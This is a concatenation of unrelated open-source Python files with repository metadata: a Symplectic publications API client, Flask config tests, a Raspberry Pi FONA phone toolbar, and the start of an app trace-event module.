# Builds an XML File of Users we want to ask Symplectic to create, in
# the format that Symplectic`s API is expecting. XML elements are
# created for each user in the list of User
# objects passed in
users_root = Element(
'import-users-request',
{'xmlns': SYMPLECTIC_XMLNS_URI}
)
# Feed
SubElement(users_root, 'feed-id').text = IMPORT_USERS_FEED_ID
# List of users(plural) - will contain user(singular) elements
users_plural_element = SubElement(users_root, 'users')
for user_object in user_objectlist:
# Add individual user(singular) sub-element
user_element = SubElement(users_plural_element, 'user')
# Add details
SubElement(user_element, 'title').text = user_object.title
SubElement(user_element, 'initials').text = user_object.initials
SubElement(user_element, 'first-name').text = user_object.first_name
SubElement(user_element, 'last-name').text = user_object.last_name
SubElement(user_element, 'known-as').text = '' # user_object.known_as
SubElement(user_element, 'suffix').text = '' # user_object.suffix
SubElement(user_element, 'email').text = user_object.email
SubElement(
user_element,
'authenticating-authority'
).text = user_object.authenticating_authority
SubElement(user_element, 'username').text = user_object.username
SubElement(
user_element,
'proprietary-id').text = user_object.proprietary_id
SubElement(
user_element,
'primary-group-descriptor'
).text = user_object.primary_group_descriptor
if user_object.is_academic is True:
SubElement(user_element, 'is-academic').text = 'true'
else:
SubElement(user_element, 'is-academic').text = 'false'
SubElement(
user_element, 'generic-field-01'
).text = user_object.generic_field_1_dept
SubElement(
user_element,
'generic-field-02'
).text = user_object.generic_field_2_dept_id
SubElement(
user_element,
'generic-field-11'
).text = user_object.generic_field_11_irg
SubElement(
user_element,
'generic-field-12'
).text = user_object.generic_field_12_irg_id
SubElement(
user_element,
'generic-field-13'
).text = user_object.generic_field_13_admin
SubElement(
user_element,
'generic-field-14'
).text = user_object.generic_field_14_institute
SubElement(
user_element,
'generic-field-15'
).text = user_object.generic_field_15_institute_id
# break connection between user_element pointer-variable and the
# actual xml-subelement in memory that contains the data
user_element = None
#Convert to ElementTree and write xml version to file
xml_filename = "".join([
SYMPLECTIC_LOCAL_XML_FOLDER,
SYMPLECTIC_LOCAL_USER_FOLDER,
TIMESTAMP,
SYMPLECTIC_LOCAL_USER_IMPORTFILE
])
ElementTree(users_root).write(xml_filename)
#Return xml filename
print "writing with", xml_filename
return xml_filename
def _create_symplectic_user_list(researcher_list):
# Creates a list of User objects from a list of
# Publications.Researcher objects
user_objectlist = []
for researcher in researcher_list:
#create symplectic specific user object
user_object = User()
user_object.title = str(researcher.person.title)
user_object.initials = researcher.person.initials
user_object.first_name = researcher.person.given_name
user_object.last_name = researcher.person.surname
user_object.known_as = ''
user_object.suffix = ''
user_object.email = researcher.person.email
user_object.authenticating_authority = AUTHENTICATING_AUTHORITY
user_object.username = researcher.person.institutional_username
user_object.proprietary_id = str(researcher.person.id)
user_object.primary_group_descriptor = 'MEDIC'
user_object.is_academic = True
if (researcher.symplectic_access) and (not researcher.publishes):
user_object.generic_field_13_admin = 'Y'
else:
user_object.generic_field_13_admin = 'N'
institute = _determine_institute(researcher)
# if (institute):
# user_object.generic_field_14_institute = institute.name
# if (institute):
# user_object.generic_field_15_institute_id = str(institute.id)
user_objectlist.append(user_object)
return user_objectlist
# functions to retrieve users from Symplectic
def get_user_ids(researcher_list):
"""
Asks Symplectic API for the ID for researchers
"""
# Retrieved SymplecticIDs
ids = []
# For each researcher, ask symplectic for their Symplectic-id
for researcher in researcher_list:
print researcher
SymplecticID = _get_users(researcher)
if SymplecticID and SymplecticID != '':
ids.append(SymplecticID)
return ids
def _get_users(researcher_object):
"""
Asks Symplectic API for User info about specified researcher
Specify which researcher using proprietary-id
Receives XML File as response
Parses XML File to find symplectic ID for each User
"""
# symplectic api url and local file path
url = "".join([
SYMPLECTIC_API_URL,
'search-users?',
'&include-deleted=true',
'&authority=',
AUTHENTICATING_AUTHORITY,
'&proprietary-id=',
str(researcher_object.person_id)
])
#'&username=' + researcher_object.person.institutional_username + \
tmp_filename = "".join([
SYMPLECTIC_LOCAL_XML_FOLDER,
SYMPLECTIC_LOCAL_USER_FOLDER,
str(researcher_object.person_id),
'.xml'
])
#get xml document from symplectic api and store on hd
try:
(tmp_filename, http_headers) = urllib.urlretrieve(url, tmp_filename)
except urllib2.URLError:
raise ESymplecticGetFileError("""
Could not HTTP GET the XML file of User GUID from Symplectic API
""")
#parse xml file
users_etree = ElementTree(file=tmp_filename)
usersresponse_element = users_etree.getroot()
#delete local file from hd
#try:
os.remove(tmp_filename)
#except:
#pass
#check if any user elements in tree
if usersresponse_element is None:
return ""
# for each retrieved user element in tree (should only be 1)
for user_element in usersresponse_element.getchildren():
# pull out of xml what symplectic says this researcher's proprietary
# id and symplectic-id are
proprietary_id = user_element.attrib.get("proprietary-id")
id = user_element.attrib.get("id")
# if arkestra and symplectic agree this is the same person
if str(researcher_object.person_id) == proprietary_id:
# researcher_object.symplectic_int_id = id # int_id version
researcher_object.symplectic_id = id # guid version
researcher_object.save()
# force return after 1 (should only be 1 person per xml file
# anyway)
return id
else:
raise ESymplecticExtractUserGUIDError("""
ID returned by Symplectic API not for correct Arkestra User
(Proprietary ID doesnt match
""")
# functions to get authored items
def get_authoreds(researcher_object):
"""
Asks Symplectic API for info about specified researcher
Receives XML File as response
Parses XML File to find all publications for that researcher & notes
preferences they have for each publication
"""
# checking
# if not(researcher_object) or (researcher_object.symplectic_int_id is
# None): # int_id version
if not(researcher_object) or (researcher_object.symplectic_id is None):
# guid version
return
# symplectic api url and local file path
# url = SYMPLECTIC_API_URL + 'users/' +
# str(researcher_object.symplectic_int_id) # int_id version
url = "".join([
SYMPLECTIC_API_URL,
'users/',
str(researcher_object.symplectic_id)
])
# # tmp_filename = SYMPLECTIC_LOCAL_XML_FOLDER +
# SYMPLECTIC_LOCAL_AUTH_FOLDER +
# str(researcher_object.symplectic_int_id)
# + '.xml' # int_id version
tmp_filename = "".join([
SYMPLECTIC_LOCAL_XML_FOLDER,
SYMPLECTIC_LOCAL_AUTH_FOLDER,
str(researcher_object.symplectic_id),
'.xml'
])
# get xml document from symplectic api and store on hd
(tmp_filename, http_headers) = urllib.urlretrieve(url, tmp_filename)
# parse xml file
publications_etree = ElementTree(file=tmp_filename)
#delete local file from hd
#try:
os.remove(tmp_filename)
#except:
#pass
#publication elements are held in a subtree
publications_subtree = publications_etree.find(
SYMPLECTIC_NAMESPACE + 'publications'
)
# check if any publication elements in subtree
if publications_subtree is None or len(publications_subtree) < 1:
return
# now that we have their newest "i authored that pub" info, we can
# delete their old "i authored that pub" info
researcher_object.remove_all_authored()
# for each publication element in subtree
for publication_element in publications_subtree.getchildren():
_create_authored(publication_element, researcher_object)
def _create_authored(publication_element, researcher_object):
"""
Takes an XML publication element lifted from a Symplectic User file
(which does not contain as much info about each
publication/biblio-record as a proper publication XML file)
extracts the minimum info (key-fields: guid) about publication, and
links publication to researcher extracts the minimum info (key-fields:
data-source) about indicated favourite biblio-record for that
publication and links biblio-record to researcher extracts full
preferences (visible, favourite, sort-order) that researcher has for
that publication
NOTE: an attempt is made to load an existing publication/biblio-record
based on the key-fields extracted if that fails then a new one is
created with only the key-fields populated and is then saved
"""
#++++++PUBLICATION LITE++++++
#check publication Element
if publication_element is None:
return
#publication guid
if publication_element is not None:
guid = publication_element.get('id', '')
if guid == '':
return
# load Publication from db or create (flagged as needing refetch from
# symplectic) if doesnt exist
publication_object = Publication.getOrCreatePublication(guid)
# ++++++BIBLIOGRAPHICRECORD LITE++++++
# bibliographic-record element -> publication sub element (used to
# read XML)
if publication_element is not None:
# only ONE biblio element per publication will be returned when querying
# by User_id this is in contrast to the multiple biblios elements per
# publication returned when querying by a Publication_guid
biblio_element = publication_element.find(
SYMPLECTIC_NAMESPACE + 'bibliographic-record'
)
#biblio data-source
if biblio_element is not None:
data_source = biblio_element.get('data-source', '')
# load BibliographicRecord from db or create if doesnt exist (NB
# links biblio & publication)
# print " going to get or create a BibliographicRecord"
biblio_object = BibliographicRecord.getOrCreateBibliographicRecord(
publication_object, data_source
)
# ++++++AUTHORED++++++
# authored preferences -> publication sub-elements (used to read XML)
if publication_element is not None:
preferences_element = publication_element.find(
SYMPLECTIC_NAMESPACE + 'preferences-for-this-publication'
)
# load Authored from db or create if doesnt exist (NB links authored
# & publication & researcher & bibliographic-record)
authored_object = Authored.getOrCreateAuthored(
publication_object, researcher_object, biblio_object
)
# preferences
if preferences_element is not None:
# Show this publication
if preferences_element.get('visible', 'false') == 'true':
authored_object.visible = True
else:
authored_object.visible = False
# Favourite publication
if preferences_element.get('is-a-favourite', 'false') == 'true':
authored_object.is_a_favourite = True
else:
authored_object.is_a_favourite = False
# Display order
authored_object.reverse_sort_cue = preferences_element.get(
'reverse-sort-cue', ''
)
authored_object.save()
# XML parsing functions
def update_publication(publication_object):
"""
Asks Symplectic API for info about specified publication based upon
its guid
Receives XML File as response
Parses XML File to find publication info & all biblio-records for that
publication
"""
# checking
# print " update_publication", publication_object
if not(publication_object) or (publication_object.guid == ''):
return
# symplectic api url and local file path
url = SYMPLECTIC_API_URL + 'publications/' + publication_object.guid
tmp_filename = "".join([
SYMPLECTIC_LOCAL_XML_FOLDER,
SYMPLECTIC_LOCAL_PUBS_FOLDER,
str(publication_object.guid),
'.xml'
])
# get xml document from symplectic api and store on hd
(tmp_filename, http_headers) = urllib.urlretrieve(url, tmp_filename)
# parse xml file
pub_etree = ElementTree(file=tmp_filename)
#d elete local file from hd
# try:
os.remove(tmp_filename)
# except:
# pass
#++++++PUBLICATION++++++
# publication element
pub_element = pub_etree.getroot()
# no loading-of/blank publication object required as updating the one
# passed in
# check returned xml element is valid and for correct publication
if pub_element is None:
return
elif publication_object.guid != pub_element.get('id', ''):
return
# publication attributes
if pub_element is not None:
publication_object.new_id = pub_element.get('new-id')
if pub_element.get('is-deleted', 'false') == 'true':
publication_object.is_deleted = True
else:
publication_object.is_deleted = False
attr_names = ["type", "created-when", "last-modified-when"]
for attr_name in attr_names:
attr_value = pub_element.get(attr_name, "")
setattr(
publication_object,
attr_name.replace("-", "_"),
attr_value
)
# just fetched latest version from symplectic
publication_object.needs_refetch = False
# save updated publication object
publication_object.save()
# ++++++BIBLIOGRAPHIC-RECORD++++++
# bibliographic-record elements are held in a subtree
biblio_subtree = pub_etree.find(
SYMPLECTIC_NAMESPACE + 'bibliographic-records'
)
# check if any bibliographic-record elements in subtree
if biblio_subtree is None or len(biblio_subtree) < 1:
return
# for each bibliographic-record element in subtree
for biblio_element in biblio_subtree.getchildren():
_create_biblio_object(biblio_element, publication_object)
def _get_element_text(element):
if element is None:
return ''
else:
return element.text
def _create_biblio_object(biblio_element, publication_object):
"""
Takes an XML biblio-record element lifted from a Symplectic Publication
file (which contains the FULL info about each biblio-record unlike a
User XML file) extracts full info about that biblio-record,
loads/creates biblio-object, populates it with this new info and saves
it
"""
# ++++++BIBLIOGRAPHIC-RECORD++++++
# check Bibliographical-record Element
# print " creating", biblio_element
if biblio_element is None:
# print " giving up in _create_biblio_object"
return
# make blank Biblio Object
biblio_object = BibliographicRecord()
# Bibliographic-record sub-elements (used to read XML)
if biblio_element is not None:
bibliometric_data_element = biblio_element.find(
SYMPLECTIC_NAMESPACE + 'bibliometric-data'
)
bibliographic_data_element = biblio_element.find(
SYMPLECTIC_NAMESPACE + 'bibliographic-data'
)
if bibliographic_data_element is not None:
native_element = bibliographic_data_element.find(
SYMPLECTIC_NAMESPACE + 'native'
)
if native_element is not None:
authors_subtree = native_element.find(SYMPLECTIC_NAMESPACE + 'authors')
keywords_subtree = native_element.find(
SYMPLECTIC_NAMESPACE + 'keywords'
)
# bibliographic-record attribs
if biblio_element is not None:
biblio_object.data_source = biblio_element.get('data-source', '')
biblio_object.id_at_source = biblio_element.get('id-at-source', '')
biblio_object.verification_status = _get_element_text(
biblio_element.find(SYMPLECTIC_NAMESPACE + 'verification-status')
)
# bibliometric data
if bibliometric_data_element is not None:
biblio_object.times_cited = _get_element_text(
bibliometric_data_element.find(
SYMPLECTIC_NAMESPACE + 'times-cited'
)
)
biblio_object.reference_count = _get_element_text(
bibliometric_data_element.find(
SYMPLECTIC_NAMESPACE + 'reference-count'
)
)
# native
if native_element is not None:
attr_names = [
'abstract', 'associated-authors', 'awarded-date', 'begin-page',
'book-author-type', 'commissioning-body', 'confidential', 'doi',
'edition', 'editors', 'end-page', 'filed-date', 'finish-date',
'isbn-10', 'isbn-13', 'issn', 'issue', 'journal',
'journal-article-type', 'language', 'location', 'medium',
'name-of-conference', 'notes', 'number', 'number-of-pages',
'number-of-pieces', 'parent-title', 'patent-number', 'pii',
'place-of-publication', 'publication-date', 'publication-status',
'publication-status', 'series', 'start-date', 'title', 'version',
'volume'
]
for attr_name in attr_names:
element = native_element.find(SYMPLECTIC_NAMESPACE + attr_name)
attr_value = _get_element_text(element)
setattr(biblio_object, attr_name.replace("-", "_"), attr_value)
# authors
if authors_subtree is not None:
biblio_object.authors = ''
author_list = []
for author_element in authors_subtree.getchildren():
name = _get_element_text(
author_element.find(SYMPLECTIC_NAMESPACE + 'name')
)
initials = _get_element_text(
author_element.find(SYMPLECTIC_NAMESPACE + 'initials')
)
author_list.append(unicode(name) + ' ' + unicode(initials))
biblio_object.authors = ", ".join(author_list)
print biblio_object.authors
#derived authors
biblio_object.number_of_authors = len(author_list)
if len(author_list) > 0:
biblio_object.first_author = author_list[0]
if len(author_list) > 1:
biblio_object.last_author = author_list[-1]
# keywords
if keywords_subtree is not None:
biblio_object.keywords = ''
for keyword_element in keywords_subtree.getchildren():
biblio_object.keywords = "|".join([
biblio_object.keywords,
unicode(keyword_element.text)
])
# link bibliographic-record object and passed-in publication object
biblio_object.publication = publication_object
# save
# print " going to save biblio_object", biblio_object, \
# "publication_id", biblio_object.publication_id
biblio_object.save()
# ++++++URLS++++++
# delete all existing URLs for this biblio-record
biblio_object.urls.all().delete()
# URL elements are held in a subtree
url_subtree = biblio_element.find(SYMPLECTIC_NAMESPACE + 'urls')
# check if any url elements in subtree
if url_subtree is None or len(url_subtree) < 1:
return
# for each url element in subtree
for url_element in url_subtree.getchildren():
_create_url_object(url_element, biblio_object)
def _create_url_object(url_element, biblio_object):
"""
Takes an XML url-biblio-record element lifted from a Symplectic
Publication file (which contains the FULL info about each biblio-record
unlike a User XML file) extracts info about that url, creates
url-object, populates it with this new info and saves it
"""
# ++++++URL++++++
# check url Element
if url_element is None:
return
# make blank URL Object
url_object = BiblioURL()
# URL data
url_object.type = url_element.get('type', '')
url_object.link = url_element.text
# link url object and passed-in biblio-record object
url_object.bibliographic_record = biblio_object
# save
url_object.save()
def mark_changed_publications(modified_since):
"""
Asks Symplectic API for info about publications modified since given
date Receives XML File as response Parses XML File to find publications
modified matches publication XML element to db publication object flags
each publication object as needing to be re-fetched from Symplectic
"""
# date needs to be in form of yyyy-mm-dd
# will then append string "T00:00:00Z" as we are in UTC-0 timezone in
# which : becomes %3A
# symplectic api url and local file path
url = "".join([
SYMPLECTIC_API_URL,
'search-publications?modified-since-when=',
modified_since,
'T00%3A00%3A00Z'
])
tmp_filename = "".join([
SYMPLECTIC_LOCAL_XML_FOLDER,
SYMPLECTIC_LOCAL_PUBSMODIFIED_FOLDER,
modified_since,
'.xml'
])
# get xml document from symplectic api and store on hd
(tmp_filename, http_headers) = urllib.urlretrieve(url, tmp_filename)
# parse xml file
search_publications_etree = ElementTree(file=tmp_filename)
# delete local file from hd
# try:
os.remove(tmp_filename)
# except:
# pass
# publication lite elements are held in a subtree BUT the subtree is
# the root element
# search_publications_subtree =
# search_publications_etree.find(SYMPLECTIC_NAMESPACE +
# 'search-publications-response')
search_publications_subtree = search_publications_etree.getroot()
# check if any publication elements in subtree
if search_publications_subtree is None or \
len(search_publications_subtree) < 1:
return
# for each publication element in subtree
for search_publication_element \
in search_publications_subtree.getchildren():
_flag_publication_as_needing_refetch(
search_publication_element
)
def _flag_publication_as_needing_refetch(search_publication_element):
"""
Takes an XML publication element lifted from a Symplectic Modified file
(which does not contain as much info about each
publication/biblio-record as a proper publication XML file)
extracts the minimum info (key-fields: guid) about publication loads
the related publication object from the db flags the publication object
as needing a re-fetch from Symplectic
NOTE: an attempt is made to load an existing publication but if it
does not already exist IT IS NOT CREATED because if the db doesn`t
know about it already then the publication has not been linked to a
reasearcher so who cares about it
"""
#++++++PUBLICATION LITE++++++
#check publication Element
if search_publication_element is None:
return
#publication guid
if search_publication_element is not None:
guid = search_publication_element.get('id', '')
if guid == '':
return
# load Publication from db if it exists, otherwise give up - DONT
# create it!
publication_object = Publication.getPublication(guid)
if publication_object is None:
return
#symplectic has an updated version of this publication
publication_object.needs_refetch = True
#save this change to the publication object
publication_object.save()
class ESymplecticError(Exception):
def __init__(self, message):
super(ESymplecticError, self).__init__(message)
def _get_message(self):
return self.args[0]
def _set_message(self, message):
self.args[0] = message
message = property(_get_message, _set_message)
class ESymplecticGetFileError(ESymplecticError):
pass
class ESymplecticParseFileError(ESymplecticError):
pass
class ESymplecticPostFileError(ESymplecticError):
pass
class ESymplecticExtractUserGUIDError(ESymplecticError):
pass
| {
"repo_name": "evildmp/arkestra-publications",
"path": "symplectic/models.py",
"copies": "1",
"size": "32335",
"license": "bsd-2-clause",
"hash": 2402671223687271400,
"line_mean": 34.6194790487,
"line_max": 79,
"alpha_frac": 0.6295036338,
"autogenerated": false,
"ratio": 3.956803720019579,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0015310938201061868,
"num_lines": 883
} |
# app/tests/test_config.py
import unittest
from flask import current_app
from flask_testing import TestCase
from app import app
class TestDevelopmentConfig(TestCase):
def create_app(self):
app.config.from_object('app.config.DevelopmentConfig')
return app
def test_app_is_development(self):
self.assertFalse(current_app.config['TESTING'])
self.assertTrue(app.config['DEBUG'] is True)
# self.assertTrue(app.config['WTF_CSRF_ENABLED'] is False)
# self.assertTrue(app.config['DEBUG_TB_ENABLED'] is True)
self.assertFalse(current_app is None)
class TestTestingConfig(TestCase):
def create_app(self):
app.config.from_object('app.config.TestingConfig')
return app
def test_app_is_testing(self):
self.assertTrue(current_app.config['TESTING'])
self.assertTrue(app.config['DEBUG'] is True)
# self.assertTrue(app.config['BCRYPT_LOG_ROUNDS'] == 4)
# self.assertTrue(app.config['WTF_CSRF_ENABLED'] is False)
class TestProductionConfig(TestCase):
def create_app(self):
app.config.from_object('app.config.ProductionConfig')
return app
def test_app_is_production(self):
self.assertFalse(current_app.config['TESTING'])
self.assertTrue(app.config['DEBUG'] is False)
# self.assertTrue(app.config['DEBUG_TB_ENABLED'] is False)
# self.assertTrue(app.config['WTF_CSRF_ENABLED'] is True)
# self.assertTrue(app.config['BCRYPT_LOG_ROUNDS'] == 13)
if __name__ == '__main__':
unittest.main()
| {
"repo_name": "7anshuai/flask-todo",
"path": "app/tests/test_config.py",
"copies": "1",
"size": "1571",
"license": "mit",
"hash": -5438790479054222000,
"line_mean": 28.0925925926,
"line_max": 66,
"alpha_frac": 0.6677275621,
"autogenerated": false,
"ratio": 3.636574074074074,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48043016361740737,
"avg_score": null,
"num_lines": null
} |
import time
import os
import pygame
from pygame.locals import *
class Toolbar():
def __init__(self, fona):
self.UPDATE_TIME = 30
self.DEAD = 30
#Setup fona
self.fona = fona
#Define colors
self.WHITE = (255,255,255)
self.BLACK = (0,0,0)
self.dead_bat = False
#Setup fonts
self.font = pygame.font.Font('/home/pi/tyos/fonts/liberation_sans.ttf', 14)
#Setup Battery Persentage Text
self.bat_left = self.font.render('..%', True, self.BLACK, self.WHITE)
self.bat_left_rect = self.bat_left.get_rect()
self.bat_left_rect.centerx = 285
self.bat_left_rect.centery = 15
#Set the Pi clock to the Fona RTC
self.rtc()
#Setup reception/battery clock
self.last_update = time.time()
def rtc(self):
#Get time from RTC on FONA
self.rtc_time = self.fona.transmit('AT+CCLK?')
self.rtc_time = self.rtc_time[1]
#Parse string to include hours and seconds only
self.rtc_time = self.rtc_time.split(',')
self.rtc_time = self.rtc_time[1]
self.rtc_time = self.rtc_time.split('-')
self.rtc_time = self.rtc_time[0]
print self.rtc_time
print 'RTC TIME:'
#Set Overall Time
os.system('sudo date +%T -s "' + self.rtc_time + '"')
def check_reception(self, rects, y):
self.raw_reception = self.fona.transmit('AT+CSQ')
self.raw_reception = self.raw_reception[1]
#Remove line feeds and echo
for i in self.raw_reception:
if i != ' ':
self.raw_reception = self.raw_reception.replace(i, '', 1)
else:
self.raw_reception = self.raw_reception.replace(i, '', 1)
break
#Extract dbm
for i in reversed(self.raw_reception):
if i != ',':
self.raw_reception = self.raw_reception.replace(i, '', 1)
else:
self.raw_reception = self.raw_reception.replace(i, '', 1)
break
try:
self.reception = int(self.raw_reception)
except:
self.reception = 0
print 'ERROR'
#Convert to bars
if self.reception > 23:
self.bars = 4
elif self.reception > 17:
self.bars = 3
elif self.reception > 12:
self.bars = 2
elif self.reception > 8:
self.bars = 1
else:
self.bars = 0
#Reception Bar rects x y w h
self.one = pygame.Rect(10, y + 18, 5, 7)
self.two = pygame.Rect(23, y + 13, 5, 12)
self.three = pygame.Rect(38, y + 8, 5, 17)
self.four = pygame.Rect(53, y + 3, 5, 22)
self.WHITE = (255,255,255)
rects = {'rects':[], 'colors':[]}
#Add them to list
if self.bars > 3:
rects['rects'].append(self.four)
rects['colors'].append(self.WHITE)
if self.bars > 2:
rects['rects'].append(self.three)
rects['colors'].append(self.WHITE)
if self.bars > 1:
rects['rects'].append(self.two)
rects['colors'].append(self.WHITE)
if self.bars > 0:
rects['rects'].append(self.one)
rects['colors'].append(self.WHITE)
print 'RECEPTION: ' + str(self.reception) + 'dbm'
return rects
def check_battery(self, text):
#Get battery level from fona
self.raw_data = self.fona.transmit('AT+CBC')
self.raw_data = self.raw_data[1]
self.raw_data = self.raw_data.split(',')
self.percentage = self.raw_data[1]
print 'BATTERY LEVEL: ' + self.percentage + '%'
if int(self.percentage) < self.DEAD:
self.dead_bat = True
text['surface'] = self.font.render(self.percentage + '%', True, self.BLACK, self.WHITE)
return text
def clock(self, rects, text, update, y):
if time.time() - self.last_update > self.UPDATE_TIME:
print 'UPDATING...'
self.last_update = time.time()
rects = self.check_reception(rects, y)
text = self.check_battery(text)
update = True
return rects, text, update, self.dead_bat
if __name__ == '__main__':
pygame.init()
t = Toolbar()
t.blit_time()
| {
"repo_name": "spadgenske/TYOS",
"path": "src/toolbar.py",
"copies": "1",
"size": "4521",
"license": "mit",
"hash": -4413084621565965300,
"line_mean": 28.940397351,
"line_max": 95,
"alpha_frac": 0.5275381553,
"autogenerated": false,
"ratio": 3.491119691119691,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.45186578464196914,
"avg_score": null,
"num_lines": null
} |
"""App trace events.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import abc
import enum # pylint: disable=wrong-import-order
import logging
from .. import _events
_LOGGER = logging.getLogger(__name__)
class AppTraceEvent(_events.TraceEvent):
"""Parent class of all app trace events.
Contains the basic attributes of all events as well as the factory method
`from_data` that instanciate an event object from its data representation.
All app event classes must derive from this class.
"""
__slots__ = (
'event_type',
'timestamp',
'source',
'instanceid',
'payload',
)
def __init__(self,
timestamp=None, source=None, instanceid=None, payload=None):
self.event_type = AppTraceEventTypes(self.__class__).name
if timestamp is None:
self.timestamp = None
else:
self.timestamp = float(timestamp)
self.source = source
self.payload = payload
self.instanceid = instanceid
@property
@abc.abstractmethod
def event_data(self):
"""Return an event's event_data.
"""
@classmethod
def _class_from_type(cls, event_type):
"""Return the class for a given event_type.
"""
etype = getattr(AppTraceEventTypes, event_type, None)
if etype is None:
_LOGGER.warning('Unknown event type %r', event_type)
return None
eclass = etype.value
return eclass
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
"""Intantiate an event from given event data.
"""
eclass = cls._class_from_type(event_type)
if eclass is None:
return None
try:
event = eclass.from_data(
timestamp=timestamp,
source=source,
instanceid=instanceid,
event_type=event_type,
event_data=event_data,
payload=payload
)
except Exception: # pylint: disable=broad-except
_LOGGER.warning('Failed to parse event type %r:', event_type,
exc_info=True)
event = None
return event
def to_data(self):
"""Return a 6 tuple represtation of an event.
"""
event_data = self.event_data
if event_data is None:
event_data = ''
return (
self.timestamp,
self.source,
self.instanceid,
self.event_type,
event_data,
self.payload
)
@classmethod
def from_dict(cls, event_data):
"""Instantiate an event from a dict of its data.
"""
event_type = event_data.pop('event_type')
eclass = cls._class_from_type(event_type)
if eclass is None:
return None
try:
event = eclass(**event_data)
except Exception: # pylint: disable=broad-except
_LOGGER.warning('Failed to instanciate event type %r:', event_type,
exc_info=True)
event = None
return event
def to_dict(self):
"""Return a dictionary representation of an event.
"""
return {
k: getattr(self, k)
for k in super(self.__class__, self).__slots__ + self.__slots__
}
class ScheduledTraceEvent(AppTraceEvent):
"""Event emitted when a container instance is placed on a node.
"""
__slots__ = (
'where',
'why',
)
def __init__(self, where, why,
timestamp=None, source=None, instanceid=None, payload=None):
super(ScheduledTraceEvent, self).__init__(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload
)
self.where = where
self.why = why
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
if ':' in event_data:
where, why = event_data.split(':', 1)
else:
where = event_data
why = None
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload,
where=where,
why=why,
)
@property
def event_data(self):
return '%s:%s' % (self.where, self.why)
class PendingTraceEvent(AppTraceEvent):
"""Event emitted when a container instance is seen by the scheduler but not
placed on a node.
"""
__slots__ = (
'why',
)
def __init__(self, why,
timestamp=None, source=None, instanceid=None, payload=None):
super(PendingTraceEvent, self).__init__(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload
)
self.why = why
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload,
why=event_data
)
@property
def event_data(self):
return self.why
class PendingDeleteTraceEvent(AppTraceEvent):
"""Event emitted when a container instance is about to be deleted from the
scheduler.
"""
__slots__ = (
'why',
)
def __init__(self, why,
timestamp=None, source=None, instanceid=None, payload=None):
super(PendingDeleteTraceEvent, self).__init__(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload
)
self.why = why
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload,
why=event_data
)
@property
def event_data(self):
return self.why
class ConfiguredTraceEvent(AppTraceEvent):
"""Event emitted when a container instance is configured on a node.
"""
__slots__ = (
'uniqueid',
)
def __init__(self, uniqueid,
timestamp=None, source=None, instanceid=None, payload=None):
super(ConfiguredTraceEvent, self).__init__(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload
)
self.uniqueid = uniqueid
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload,
uniqueid=event_data
)
@property
def event_data(self):
return self.uniqueid
class DeletedTraceEvent(AppTraceEvent):
"""Event emitted when a container instance is deleted from the scheduler.
"""
__slots__ = (
)
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload
)
@property
def event_data(self):
pass
class FinishedTraceEvent(AppTraceEvent):
"""Event emitted when a container instance finished.
"""
__slots__ = (
'rc',
'signal',
)
def __init__(self, rc, signal,
timestamp=None, source=None, instanceid=None, payload=None):
super(FinishedTraceEvent, self).__init__(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload
)
self.rc = int(rc)
self.signal = int(signal)
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
rc, signal = event_data.split('.', 2)
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload,
rc=rc,
signal=signal
)
@property
def event_data(self):
return '{rc}.{signal}'.format(
rc=self.rc,
signal=self.signal
)
class AbortedTraceEvent(AppTraceEvent):
"""Event emitted when a container instance was aborted.
"""
__slots__ = (
'why',
)
def __init__(self, why,
timestamp=None, source=None, instanceid=None, payload=None):
super(AbortedTraceEvent, self).__init__(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload
)
self.why = why
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload,
why=event_data
)
@property
def event_data(self):
return self.why
class KilledTraceEvent(AppTraceEvent):
"""Event emitted when a container instance was killed.
"""
__slots__ = (
'is_oom',
)
def __init__(self, is_oom,
timestamp=None, source=None, instanceid=None, payload=None):
super(KilledTraceEvent, self).__init__(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload
)
self.is_oom = is_oom
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload,
is_oom=(event_data == 'oom')
)
@property
def event_data(self):
return '{oom}'.format(
oom=('oom' if self.is_oom else '')
)
class ServiceRunningTraceEvent(AppTraceEvent):
"""Event emitted when a service of container instance started.
"""
__slots__ = (
'uniqueid',
'service',
)
def __init__(self, uniqueid, service,
timestamp=None, source=None, instanceid=None, payload=None):
super(ServiceRunningTraceEvent, self).__init__(
timestamp=timestamp,
